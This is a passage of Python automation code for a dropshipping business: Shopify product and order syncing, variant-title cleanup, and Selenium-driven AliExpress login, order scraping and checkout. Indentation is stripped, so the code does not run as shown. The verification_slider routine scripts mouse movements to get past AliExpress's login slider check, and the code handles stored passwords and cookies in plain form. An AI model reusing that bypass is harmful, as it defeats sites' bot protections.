Filter(Settlement,shop=shop1).update(shop=shop2)
Filter(StatusVerification,shop=shop1).update(shop=shop2)
Filter(Subscription,shop=shop1).update(shop=shop2)
Filter(TertiaryAction,shop=shop1).update(shop=shop2)
Filter(TertiaryAction_Template,shop=shop1).update(shop=shop2)
Filter(UniqueProductIdentifier,shop=shop1).update(shop=shop2)
class ShippingCost:
def get_shipping_cost(self,x,shop):
sorted_companies_list = ifelseget(lambda:Shop()(shop).Allow_Additional_Shipping_Methods,lambda:["SunYou Economic Air Mail","Yanwen Economic Air Mail","China Air Post","China Post Registered Air Mail","ePacket","AliExpress Standard Shipping"],lambda:["ePacket"])
data = sorted([new_dict(i,["companyDisplayName","price"]) for i in x if i.companyDisplayName in sorted_companies_list],key=lambda i:sorted_companies_list.index(i.companyDisplayName))
return flt(data[0].price)
def get_shipping_company(self,x,shop):
sorted_companies_list = ifelseget(lambda:Shop()(shop).Allow_Additional_Shipping_Methods,lambda:["SunYou Economic Air Mail","Yanwen Economic Air Mail","China Air Post","China Post Registered Air Mail","ePacket","AliExpress Standard Shipping"],lambda:["ePacket"])
data = sorted([new_dict(i,["companyDisplayName","price"]) for i in x if i.companyDisplayName in sorted_companies_list],key=lambda i:sorted_companies_list.index(i.companyDisplayName))
return data[0].companyDisplayName
class Variant_Titler:
def title_variant(self,x):
products = getshopifyproducts("rom",created_at_min=datetime(2020, 1, 19, 23, 8, 13))
option_names = []
for i in products:
for j in i.variants:
option_names.append(j.option1)
option_names.append(j.option2)
option_names.append(j.option3)
option_names = sorted(oset(listminus(option_names,None)))
option_names = lmap(lambda i:re_found_function(i,"(?i)^asian",lambda i:re_substitute(i,["(?i)^asian",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)cm",lambda i:re_substitute(re_substitute_function(i,"[\d\.]+",lambda i:or_list(lambda:list_and(lambda:str(round(flt(i)/2.54,1)).endswith(".0"),lambda:str(int(round(flt(i)/2.54,1)))),lambda:str(round(flt(i)/2.54,1)))),["(?i)cm","cm"]) ),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^For",lambda i:re_substitute(i,["(?i)^For",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)iPhone",lambda i:re_substitute(i,["(?i)iPhone","iPhone"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)Style",lambda i:i),option_names)
option_names = lmap(lambda i:re_found_function(i," {2,}",lambda i:re_substitute(i,[" {2,}"," "])),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)eu size",lambda i:re_substitute(i,["(?i)eu size",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^Size[- ]",lambda i:re_substitute(i,["(?i)^Size[- ]",""]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^A\d+)",lambda i:re_substitute(i,["(?i)(^A\d+)","Samsung \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^J\d+)",lambda i:re_substitute(i,["(?i)(^J\d+)","Samsung \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^P\d+)",lambda i:re_substitute(i,["(?i)(^P\d+)","Huawei \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)^Galaxy",lambda i:re_substitute(re_substitute(i,["(?i)^Galaxy","Samsung Galaxy"]),["Samsung Galaxy","Samsung"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(^P Smart)",lambda i:re_substitute(i,["(?i)(^P Smart)","Huawei \\1"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)(\d+)Xl",lambda i:re_substitute(i,["(?i)(\d+)Xl","\\1XL"]).strip()),option_names)
option_names = lmap(lambda i:re_found_function(i,"(?i)((?:^Xl$|^Xs$))",lambda i:re_substitute(i,["(?i)((?:^Xl$|^Xs$))","\\1"]).upper()),option_names)
option_names = sorted(oset(option_names))
def run(self):
products = getshopifyproducts("rom",created_at_min=datetime(2020, 1, 19, 23, 8, 13))
for a in products:
for b in a.variants:
for c in [1,2,3]:
if getattr(b,"option%s"%(c)) != None:
old = getattr(b,"option%s"%(c))
setattr(b,"option%s"%(c),adjustvariantname(getattr(b,"option%s"%c)))
print(old, getattr(b,"option%s"%(c)))
pool(lambda:apilimitcall(a.save))
time.sleep(1)
class Product_Manager:
def __init__(self, sleeptime = 3600 * 3):
Aliexpress_Products().refresh_product_inventories()
blueprint("[sleeping][%s]"%sleeptime)
time.sleep(sleeptime)
self.__init__(sleeptime)
class Product_Unpender:
def __init__(self):
strand( Aliexpress_Products().create_product )
class Product_Handles:
# Basically, it shows the day's sales for all shops, as well and if clicked, shows the adsets.
def __init__(self):
import rumps
from rumps import MenuItem as M
from rumps import MenuItem
self.app = rumps.App("Product_Handles",quit_button=Null)
globals().update(locals())
self.set_menu()
#process( lambda: [time.sleep(6.15), self.set_menu()] )
time.sleep(4)
self.app.run()
def set_menu(self):
keys = list(self.app.menu.keys())
redprint(keys)
for i in keys:
self.app.menu.pop(i)
keycall("Icon",All(Adset))
self.app.menu = [MenuItem("/",callback=lambda _=None:[])]+[
MenuItem("") for i in All(Handle)
]
class ProductUpdates:
def run(self,shop):
for i in Filter(Product,shop=shop):
i.Refresh()
def create_products_via_csv(infile):
data = CSV().DictRead(infile)
[Aliexpress(c=20, verbose=False).create_product(**row) for row in data[350:]]
affix_product_descriptions()
def sort_collections():
pass
def theme():
@timedtask
def theme():
os.system("/Applications/Google\ Chrome\ 70.app/Contents/MacOS/Google\ Chrome &")
os.system("/Applications/Adobe\ Photoshop\ CC\ 2018/Adobe\ Photoshop\ CC\ 2018.app/Contents/MacOS/Adobe\ Photoshop\ CC\ 2018 &")
redinput(" Theme -- ")
def unpend_orders():
Order_Unpender().unpend_orders()
class eCommerce_Item_Enlivener(DecisionTree):
def wordcount(self, x):
apostrophes = x.count("'")
words = len(x.split(" "))
count = apostrophes + words
return count
def wordcount_by_productIds(self, x, shop):
return [eCommerce_Item_Enlivener().wordcount(Shop()(shop).pfind(id_=i).body_html) for i in x]
def format_products_feed1(self, shop):
x = [i.split("/")[-1] for i in get_all_chrome_urls() if "/products/" in i]
x = [Shop()( shop).pfind(handle=i)[0] for i in x]
[[setattr(i,"body_html",""),i.save()] for i in x]
y = ""
y += "\n"
for i in x:
y += "url: " + "https://"+Shop()(shop).Shopify_App_API_Url.split("@")[1]+"/products/%s"%i.id
y += "\n"
y += "words: "
y += "\n"
y += "\n"
with open(homepath("~/tavern/tavern/bag/%s"%datetime.now().strftime("%m_%d_%Y_set.txt")), "w") as f:
f.write(y)
def format_products_feed(self, io=None):
io = get_all_chrome_urls() if(None==io) else io
y = ""
y += "\n"
data = []
if(type(io[0]) == str):
for i in io:
SHOP = Get(Shop,Domain_Name__icontains=re.findall("[a-zA-Z]+.com",i)[0])
p = Shop()( SHOP.shop_abbreviation ).pfind(handle=i.split("/")[-1])[0]
data.append(p)
else:
data = io
for p in data:
SHOP = Shop()(Get(Shop,Business_Name=p.vendor).shop_abbreviation)
p.body_html = ""; p.save()
y += "url: " + "https://"+SHOP.Shopify_App_API_Url.split("@")[1]+"/products/%s"%p.id
y += "\n"
y += "words: "
y += "\n"
y += "\n"
with open(homepath("~/tavern/tavern/bag/%s"%datetime.now().strftime("%m_%d_%Y_set.txt")), "w") as f:
f.write(y)
def read(self):
address = input("address?: ")
shop = input("shop?: ")
wordsum = sum( [int(i) for i in re.findall("[\n ]([0-9][0-9])[\n ]",open(address).read()+"\n")] )
productIds = [int(i) for i in re.findall("[/]([0-9][0-9][0-9][0-9]+)[\n ]",open(address).read()+"\n")]
wordcount = eCommerce_Item_Enlivener().wordcount_by_productIds(productIds, shop = shop)
redprint("wordsum: %s" % wordsum, "wordcount: %s" % wordcount, "productIds: %s" % productIds)
def a_shop():
return Shop()(All(Shop)[0].shop_abbreviation)
""" Business-Utils-Order-Utils """
def aliexpress_dialog_box_adjust_city(city):
city = city.upper()
if "ST." in city:
redprint("ST. in %s, replacing ST. with SAINT" % (city))
city = city.replace("ST.", "SAINT")
city = city.replace("'", "")
city = city.capitalize()
return city
def alitracker(*args):
print(args)
order = Get(Order,order_number=int(args[1]))
x = Filter(Lineitem,shop=args[0],order_id=order.id)
if x:
return Get(Lineitem,shop=args[0],order_id=order.id).ali_tracking_number
else:
return "Unable to get tracking number for order number %s in %s. It is not available yet." % (args[1],args[0])
def calculate_average_shipping_time():
x = Lineitem.objects.filter(~Q(ali_tracking_number=None))
keycall("get_tracking_events",x)
no_data = [i for i in x if i == None]
delivered = [i for i in x if i != None and "DELIVERED" in i.events()[-1].upper()]
delivering = [i for i in x if i != None and "DELIVERED" not in i.events()[-1].upper()]
assert len(delivered) + len(delivering) + len(no_data) == len(x)
average_delivered_times = [(i.events()[-1].date()-i.events()[0].date()).days+(((i.events()[-1].date()-i.events()[0].date())).seconds/(24*60*60)) for i in delivered]
average_delivered_time_days = tryreturn(lambda:sum(average_delivered_times)/len(average_delivered_times))
average_delivered_time_business_days = average_delivered_time_days * (5/7)
average_delivered_time = average_delivered_time_business_days
average_delivered_times = [round(i,2) for i in average_delivered_times]
average_delivering_times = [(i.events()[-1].date()-i.events()[0].date()).days+(((i.events()[-1].date()-i.events()[0].date())).seconds/(24*60*60)) for i in delivering]
average_delivering_time_days = tryreturn(lambda:sum(average_delivering_times)/len(average_delivering_times))
average_delivering_time_business_days = average_delivering_time_days * (5/7)
average_delivering_time = average_delivering_time_business_days
average_delivering_times = [round(i,2) for i in average_delivering_times]
distinct_print(ordered_json_dumps({a:b for a,b in locals().items() if "average" in a}))
def lineitemsFeed(shop, date_range=36):
shop=((Shop()(shop))if(type(shop)==str)else(shop))
ordersFeed(shop, date_range=date_range)
# oken orders should be already deleted by then now.
x = 0
for order in Order.objects.filter(shop=shop.shop_abbreviation):
for lineitem in order.line_items:
lineitem = AttrDict(lineitem) #
new = Lineitem()
existing = Lineitem.objects.filter(id=lineitem.id)
if len(existing) != 0:
new = existing[0]
# [shop, order, lineitem]
new.shop = shop.shop_abbreviation; #print("abbre: %s" % shop.shop_abbreviation)
new.financial_status = order.financial_status
new.id = lineitem.id
new.variant_id = lineitem.variant_id
#if "product_id" not in new.__dict__.keys():
# greenprint("product id is not inside existing lineitem __dict__ keys. add it in.")
try:
int(new.product_id)
except Exception as e:
magentaprint("[disregard [lineitem.product deleted]] Error, %s [setting a new product_id [%s] for line_item %s] -- [lineitem.product_id == None, lineitem.product deleted]"%(e,lineitem.product_id,lineitem.id))
new.product_id = lineitem.product_id
#else:
# redprint("product id is inside existing lineitem __dict__ keys. not add it in.")
new.order_id = order.id
new.quantity = lineitem.quantity
new.grams = lineitem.grams
new.fulfillment_tracking_numbers = []
new.date = order.date
new.created_at = order.created_at
if new.created_at < Shop()(shop.shop_abbreviation).Lineitem_Most_Recent_Date:
continue
for i in order.fulfillments:
for j in i["line_items"]:
if j["id"] == lineitem.id:
#try:
new.fulfillment_id = i["id"]
tracking_numbers = i.get("tracking_numbers", None)
if tracking_numbers != None:
new.fulfillment_tracking_numbers.extend(tracking_numbers)
#except:
# return j
new.fulfillment_service = lineitem.fulfillment_service # [added 4/21/19]
new.fulfillment_status = lineitem.fulfillment_status
new.variant_title = lineitem.variant_title
new.title = lineitem.title
new.sku = lineitem.sku
#if order.total_line_items_price == None:
# new.price = order.total_price
#else:
# evened_shipping_price = ((float(order.total_price) - order.total_line_items_price) / len(order.line_items)) #Calculate Shipprice via Total-price-lineitemsprice and Divide that by # lineitems.
# old = float(lineitem.price)
# new.price = float(lineitem.price) + evened_shipping_price
# print(order.id, 'old: ', old, evened_shipping_price, "new with even, %s" % new.price)
new.price = float(lineitem.price) + ((float(order.total_price) - order.total_line_items_price) / len(order.line_items)) if order.total_line_items_price != None else order.total_price
# new.ali_price (nothingtodohere)
# new.ali_tracking_number (nothingtodohere)
# new.ali_tracking_method (nothingtodohere)
# new.ali_order_number (nothingtodohere)
new.shipping_address = order.shipping_address
# new.e2 # time between fulfillment and tracking number post
# new.e1 # time between orderplacement and fulfillment
# new.t3 # time tracking number posts
# new.t2 # time fulfilled
new.t1 = Date().myDatetimenow(order.created_at) # (TypeError: can't subtract offset-naive and offset-aware datetimes)
# datetime.datetime(2018, 3, 4, 6, 49, 19, tzinfo=tzoffset(None, -18000))
new.save()
#print( " saving: %s " % new.save() )
x += 1
OSA.notify(str(x))
# lineitemsFeed(a_shop())
def onyx(e=None):
# lmao, this also works.
return onyx_lineitems(e)
def onyx_lineitems(e=None):
# lmao, this also works.
x = All(Lineitem)
data = []
for i in x:
to_add = True
if i.financial_status == "refunded":
to_add = False
if i.fulfillment_status == "unfulfilled":
to_add = False
if i.fulfillment_status == None:
to_add = False
if to_add == True:
assert i.fulfillment_status in ["partial"] or i.fulfillment_status in ["fulfilled"]
if to_add == True:
data.append(i)
not_refunded = Filter(Lineitem,(~Q(financial_status="refunded")))
if e == None:
return data
elif e == "e1":
return [i for i in not_refunded if i.t1 and not i.t2] # not_refunded because this is for ... not refunded. so, leftover is to-go. w/means partial/fulfilled can't be. so must be: unfulfilled. but, include partial/fulfilled, just in case.
elif e == "e2":
return [i for i in data if i.t2 and not i.t3]
elif e == "e3":
return [i for i in data if i.t3 and not i.t4]
elif e == "e4":
return [i for i in data if i.t4]
def onyx_orders():
not_refunded = Filter(Order,(~Q(financial_status="refunded")))
partially_fulfilled = not_refunded.filter(fulfillment_status="partial")
fulfilled = not_refunded.filter(fulfillment_status="fulfilled")
W = list(partially_fulfilled) + list(fulfilled)
redprint("ONYX ORDERS REIGNED %s ORDERS" % len(W))
return W
def ordersCreate():
print("ordersCreating...")
def ordersFeed(shop, date_range=36):
shop=((Shop()(shop))if(type(shop)==str)else(shop))
print("Setting Orders in last %s days"%date_range)
orders = sum([shop.shopify.Order.find(status='any',limit=250, page=pg, created_at_min=Date().dt(-1 * date_range,'%Y-%m-%d')) for pg in range(1, 1+ceil(shop.shopify.Order.count(created_at_min=(Date()-date_range).dateobj ) /250)) ],[])
payload = []
for i in orders:
x = i.to_dict()
x["created_at"] = Date().parse_date(x["created_at"]).replace(tzinfo=None)
x['date'] = x["created_at"].date()
x['shop'] = shop.init_shop
x["billing_address_contact_name"] = "%s %s"%(x["billing_address"]["first_name"],x["billing_address"]["last_name"])
if x['fulfillment_status'] is None:
x['fulfillment_status'] = 'null'
x["line_items"] = [{f:r[f] for f in ["fulfillment_service","fulfillment_status","gift_card","grams","id","name","price","product_exists","product_id","quantity","sku","title","total_discount","total_discount_set","variant_id","variant_inventory_management","variant_title",]} for r in x["line_items"]]
SecondaryAction().take_from_order(x)
payload.append(x)
Order.objects.update_or_create(**x)
# I cancelled an order that was a test to myself, so It could not be filtered. manually delete it.
return payload
def ordersTrack():
print("...summoning ordersTrack...")
payload = []
for i in range(10):
data = {}
payload.append(data)
print("orders_tracking_core payload: %s"%payload)
return payload
def query_google_tracking_urls(tracking_number):
return re.findall(r'http.*?"',requests.get("https://www.google.com/async/lrfapt?ei=2grpW47TMKza5gKd16vIAg&yv=3&async=lrfsb:{},_id:lrf-pt-async,_pms:s,_fmt:pc".format(tracking_number)).text)
def similarimagesCreate():
print("similarimagesCreating...")
# exec(boot_django)
def test_variant_names():
return chromejs("x = document.getElementsByClassName('sku-property-list'); y = x.length; var a = []; for (i=0;i<y;i++) { z = x[i].getElementsByTagName('img'); if(z.length > 0){a.push(...z)}; b = x[i].getElementsByClassName('sku-property-text'); if (b.length > 0) {a.push(...b)} } ; a; c = []; e = a.length; for (i=0;i<e;i++) {if(a[i].title) {c = c.concat(a[i].title)}; if(a[i].textContent) {c = c.concat(a[i].textContent)} }; c")
def update_address():
shop, order_number = dune(OSA.log("Shop abbreviation and order number to update an address for [separated by ', ', for example: 'xyz, 1001']?").split(", "),[lambda i: i,lambda i:int(i)])
name, address1, address2, city, state, zip_code = None, None, None, None, None, None
x = OSA.log("Updated shipping address [For example: Adam Watson, 123 A St, Address Line 2 (optional), City A, State, Zip Code]?").split(", ")
if len(x) == 6:
name, address1, address2, city, state, zip_code = x
elif len(x) == 5:
name, address1, city, state, zip_code = x
updated_shipping_address = {"name":name,"address1":address1,"address2":address2,"city":city,"province":state,"zip_code":zip_code}
order = Get(Order,shop=shop,order_number=order_number)
lineitems = Filter(Lineitem,order_id=order.id)
lmap(lambda i: Update(i, updated_shipping_address = updated_shipping_address), lineitems)
updated_shipping_addresses = key("updated_shipping_address",lineitems)
updated_shipping_addresses_x = oset(updated_shipping_addresses)
assert len(updated_shipping_addresses_x) == 1
updated_shipping_address_x = updated_shipping_addresses_x[0]
if updated_shipping_address_x["address2"] != None:
OSA.log("Updated shipping address:\n%s, %s, %s, %s, %s, %s"%(updated_shipping_address_x["name"], updated_shipping_address_x["address1"], updated_shipping_address_x["address2"], updated_shipping_address_x["city"], updated_shipping_address_x["province"], updated_shipping_address_x["zip_code"]),tp=False)
elif updated_shipping_address_x["address2"] == None:
OSA.log("Updated shipping address:\n%s, %s, %s, %s, %s"%(updated_shipping_address_x["name"], updated_shipping_address_x["address1"], updated_shipping_address_x["city"], updated_shipping_address_x["province"], updated_shipping_address_x["zip_code"]),tp=False)
def verification_slider(self):
try:
count_of_verification_slider_elements = self.ss.ffss("label","for","fm-login-checkcode")
if len(count_of_verification_slider_elements) == 1:
##
def move_verification_slider(x1=431, x2=574, y1=273, signin_x1=571, signin_y1=304):
print("Found verification slider.")
OSA("Firefox")
self.ss.zoom_out()
self.ss.zoom_in(1)
zz(2)
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 1" % (x1, y1))
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 0" % (x1, y1))
os.system("~/tavern/tavern/.MouseTools -doubleLeftClick; sleep 2")
os.system("~/tavern/tavern/.MouseTools -leftClickNoRelease; sleep 0.5")
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 1" % (x2, y1))
os.system("~/tavern/tavern/.MouseTools -releaseMouse; sleep 0.2")
os.system("~/tavern/tavern/.MouseTools -leftClick; sleep 2")
os.system("~/tavern/tavern/.MouseTools -x %s -y %s; sleep 0" % (x1+15, y1))
os.system("~/tavern/tavern/.MouseTools -leftClick; sleep 2")
OSA("Firefox")
self.ss.find_element_by_name("password").clear()
self.ss.find_element_by_name("password").send_keys(password)
OSA("Firefox", ["return"])
zz(10)
self.ss.refresh()
try:
self.ss.switch_to_frame("alibaba-login-box")
self.ss.find_element_by_name("loginId").clear()
self.ss.find_element_by_name("loginId").send_keys(username)
self.ss.find_element_by_name("password").send_keys(password)
self.ss.find_element_by_name("submit-btn").send_keys(self.ss.Keys.ENTER)
except Exception as e:
print("error: %s" % e)
zz(15)
move_verification_slider()
##
except Exception as e:
print("No slider.")
class Aliexpress_Requests:
def __init__(self,window_index=[0,0,3.5,3.5],ph=True,exit_browser=True):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
if(tryreturn(lambda: cookies_to_session(cookies_to_database(self.username, "AliExpress"), requests.Session()).get("https://trade.aliexpress.com/orderList.htm",headers=session_headers).url.find("aliexpress.com/orderList.htm"))>0):
tryprocess(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=self.ss.get_cookies(),reverse=False))
self.rq = cookies_to_session(cookies_to_database(self.username, "AliExpress"), requests.Session())
self.rq.headers = session_headers
return
else:
self.ss = Browser()( ("ch+"if(True==self.ph)else("sele")) ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else())
self.__init__(window_index=window_index,ph=ph,exit_browser=exit_browser)
def __call__(self):
return self.rq
class Aliexpressorderpager:
def get_urls(self, x1, x2, get_order_info = True):
# x1,x2,get_order_info=(Date()-15)(),(Date()-0)(),False
session = Aliexpress_Requests()()
r = session.get("https://trade.aliexpress.com/orderList.htm")
if r.status_code != 200: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
soup = tryreturn(lambda:BeautifulSoup(Replacements(r.content.decode(),"\n", "", "\r", "", "\t", ""), "lxml"))
if soup == 0: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
m_page = (or_list(lambda:[int(i.text) for i in soup.findAll(attrs={"class": "ui-goto-page"})[::-1] if i.text.isdigit()][0],0)) + 1
print('max ', m_page)
for page in range(0, m_page):
_csrf_input = soup.find(attrs={"name": '_csrf_token'})
if _csrf_input == None:
return
csrf = _csrf_input.attrs["value"]
if a_shop().AliExpress_Most_Recent_Date > x1:
x1 = Date(a_shop().AliExpress_Most_Recent_Date)
if a_shop().AliExpress_Most_Recent_Date > x2:
x2 = Date(a_shop().AliExpress_Most_Recent_Date)
query = {
"action": "OrderListAction",
"eventSubmitDoPage": "doPage",
"_fm.o._0.s":(x1).strftime("%m/%d/%Y"),
"_fm.o._0.e":(x2).strftime("%m/%d/%Y"),
"_fm.o._0.cu": page,
"pageNum": page + 1,
"_csrf_token": csrf}
print("Wait...")
time.sleep(2)
r = session.post("https://trade.aliexpress.com/orderList.htm", data=query)
if r.status_code != 200: OSA.log("error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")
soup = BeautifulSoup(Replacements(r.content.decode(),"\n", "", "\r", "", "\t", ""), "lxml")
order_ids = lmap(lambda i: int(findall(i.attrs["href"],"orderId=(.*)")[0]), soup.findAll(attrs={"class": "view-detail-link"}))
order_times = [Date().myDatetimenow(Date().parse_date(i.text)) for i in soup.findAll("span", attrs={"class":"info-body"}) if tryprocess(lambda: Date().parse_date(i.text)) == 1]
print("len order ids: %s" % len(order_ids))
print("Get order list Success, current page is %s" % (page + 1))
links = soup.findAll(attrs={"class": "view-detail-link"})
exec(subtract)
# AliExpress_Account_Order_Scan_Earliest_Date
lmap(lambda i: Push(Aliexpressorder,id=i[0])(order_time=i[1]) , list(zip(order_ids,order_times)))
if len(order_ids) == 0:
return
if get_order_info == True:
for order_id, order_time in zip(order_ids, order_times):
pool(lambda:Aliexpressorder().order_info(order_id, order_time))
time.sleep(1)
""" 'x1 = Date()-400\nx2 = Date() - 0\nget_order_info = True\nr = Aliexpress_Requests()().get("https://trade.aliexpress.com/orderList.htm")\nif r.status_code != 200: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\nsoup = tryreturn(lambda:BeautifulSoup(Replacements(r.content.decode(),"\\n", "", "\\r", "", "\\t", ""), "lxml"))\nif soup == 0: OSA.log("Error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\nm_page = (or_list(lambda:[int(i.text) for i in soup.findAll(attrs={"class": "ui-goto-page"})[::-1] if i.text.isdigit()][0],0)) + 1\nprint(\'max \', m_page)\nfor page in range(0, m_page):\n _csrf_input = soup.find(attrs={"name": \'_csrf_token\'})\n csrf = _csrf_input.attrs["value"]\n query = {\n "action": "OrderListAction",\n "eventSubmitDoPage": "doPage",\n "_fm.o._0.s":(x1).strftime("%m/%d/%Y"),\n "_fm.o._0.e":(x2).strftime("%m/%d/%Y"),\n "_fm.o._0.cu": page,\n "pageNum": page + 1,\n "_csrf_token": csrf}\n print("Wait...")\n time.sleep(2)\n response = Aliexpress_Requests()().post("https://trade.aliexpress.com/orderList.htm", data=query)\n if response.status_code != 200: OSA.log("error in requesting Aliexpress orders. Some things that can cause this is using a vpn or a using a vps. Please make sure your password is correct as well")\n\n soup = BeautifulSoup(Replacements(r.content.decode(),"\\n", "", "\\r", "", "\\t", ""), "lxml")\n order_ids = lmap(lambda i: int(findall(i.attrs["href"],"orderId=(.*)")[0]), soup.findAll(attrs={"class": "view-detail-link"}))\n order_times = [Date().myDatetimenow(Date().parse_date(i.text)) for i in soup.findAll("span", attrs={"class":"info-body"}) if tryprocess(lambda: Date().parse_date(i.text)) == 1]\n print("len order ids: %s" % len(order_ids))\n print("Get order list Success, current page is %s" % (page + 1))\n\n if len(order_ids) > 0 and get_order_info == True:\n for order_id, order_time in zip(order_ids, order_times):\n Aliexpressorder().order_info(order_id, order_time)\n time.sleep(1)\n' """
class Order_Unpender:
def __init__(self,window_index=[0,0,3.5,3.5],ph=False,exit_browser=False):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
self.ss = Browser()( ("ch+"if(True==self.ph)else("sele")) ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else())
def __call__(self_):
# Exec("x_shop = Muta()().store_abbre\nLineitemsFeed().LineitemsFeed(x_shop)\nunfulfilled_orders = keyby(lambda i: InceptedProduct().RScan(id=i.product_id).ali_url, list(tcer(Lineitem.objects.filter(fulfillment_status=None, financial_status='paid', shop=x_shop))))",globals(),locals())
""" Exec = exec; self_ = self """
x_shop = Muta()().store_abbre
LineitemsFeed().LineitemsFeed(x_shop)
unfulfilled_orders = keyby(lambda i: InceptedProduct().RScan(id=i.product_id).ali_url, list(tcer(Lineitem.objects.filter(fulfillment_status=None, financial_status='paid', shop=x_shop))))
# """
if not unfulfilled_orders: return (print("Waiting"), sp(60), self_())
# """
setattrs(self_,"seed_order",
lambda:unfulfilled_orders[-1],
"shop",lambda:Shop()(self_.seed_order.shop),
"real_order",lambda:Get(Order,id=self_.seed_order.order_id),
"orders",lambda:lmap(lambda i:Get(Lineitem,id=AttrDict(i).id), keyby(lambda i: (InceptedProduct().RScan(id=AD(i).product_id).aliexpressvendor) == (InceptedProduct().RScan(id=self_.seed_order.product_id).aliexpressvendor), self_.real_order.line_items)),
"fulfilled_line_items",lambda:[])
print(self_.seed_order)
Exec('globalise(lmap(lambda i: AttrDict(i.to_dict()), Shop()(x_shop).shopify.OrderRisk.find(order_id=self_.seed_order.order_id)),"a")\nif(globe("a") != []):\n if (max(set(lmap(lambda i:float(i),sud("score",globe("a")))))>=0.5 or "cancel" in sud("recommendation",globe("a"))):\n OSA.log("Please go to %s in your browser and cancel or refund any high fraud order items"%("%s/orders/%s"%(self_.shop.Administrative_Url,self_.seed_order.id)))\n (0/0)\nelse:\n x = OSA.log("Order Risk Details\\n\\nScores: %s\\nMessages: %s\\nRecommendations: %s\\n\\n\\nContinue?"%(Join(", ",sud("score",globe("a"))),Join(", ",sud("message",globe("a"))),Join(", ",sud("recommendation",globe("a")))),tp=False,buttons=["No","Yes"])\n if x == "Yes":\n (OSA.log("Continuing",tp=False))\n else:\n (0/0)',globals(),locals())
self_.ss.get("https://shoppingcart.aliexpress.com/shopcart/shopcartDetail.htm?").tp(lambda:lmap(lambda i: (i.click(),sp(2),self_.ss.ffst("button","OK").click().sp(5)), self_.ss.jtns("button",0,{"ae_button_type":"remove"})))
shipping_address = or_list(lambda:self_.seed_order.updated_shipping_address,lambda:self_.seed_order.shipping_address)
country, state, city, zip_, address1, address2, name, province = (country_code_dict[shipping_address['country_code']] , states.get(shipping_address['province_code']) if shipping_address['country_code'] == "US" else shipping_address['province'] , aliexpress_dialog_box_adjust_city(shipping_address['city'].strip().capitalize()) , shipping_address['zip'] , shipping_address['address1'] , shipping_address['address2'] , shipping_address['name'] , shipping_address['province'])
tp(lambda:lmap(lambda i: print("%s: %s"%(i, eval(i))), ["country", "state", "city", "zip_", "address1", "address2", "name", "province"]))
#
self_.ss.get("https://ilogisticsaddress.aliexpress.com/addressList.htm").tp(lambda:ifelseget(lambda:"selectedAddressId" in self_.ss.current_url,lambda:None,lambda:self_.ss.fcns("sa-edit").click()))
lmap(lambda i:i.click(),[i for i in self_.ss.fcns("sa-country")[0].find_elements_by_tag_name("option") if i.text == country])
for i in self_.ss.fcns("sa-country")[0].find_elements_by_tag_name("option"):
if i.text == country:
i.click()
time.sleep(1)
break
for i in self_.ss.fcns("sa-province-wrapper")[0].find_elements_by_tag_name("option"):
if i.text == state:
i.click()
time.sleep(1)
break
for i in self_.ss.fcns("sa-city-wrapper")[0].find_elements_by_tag_name("option"):
if i.text == city:
i.click()
time.sleep(1)
break
self_.ss.bat().fn("contactPerson").send_keys(name).sp(1).fn("address").send_keys(address1).sp(1).fn("address2").send_keys(address2)
self_.ss.sp(1).fn("zip").send_keys(zip_).sp(1).fn("mobileNo").send_keys(Shop()(x_shop).Business_Phone_Number).sp(1)
self_.ss.fn("isDefault").click().fcns("sa-confirm").click()
shipping_address_ = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
self_.ss.save_screenshot(shipping_address_)
OSA.log("The projected count of items in this order is %s"%(len(self_.orders)))
for order in self_.orders:
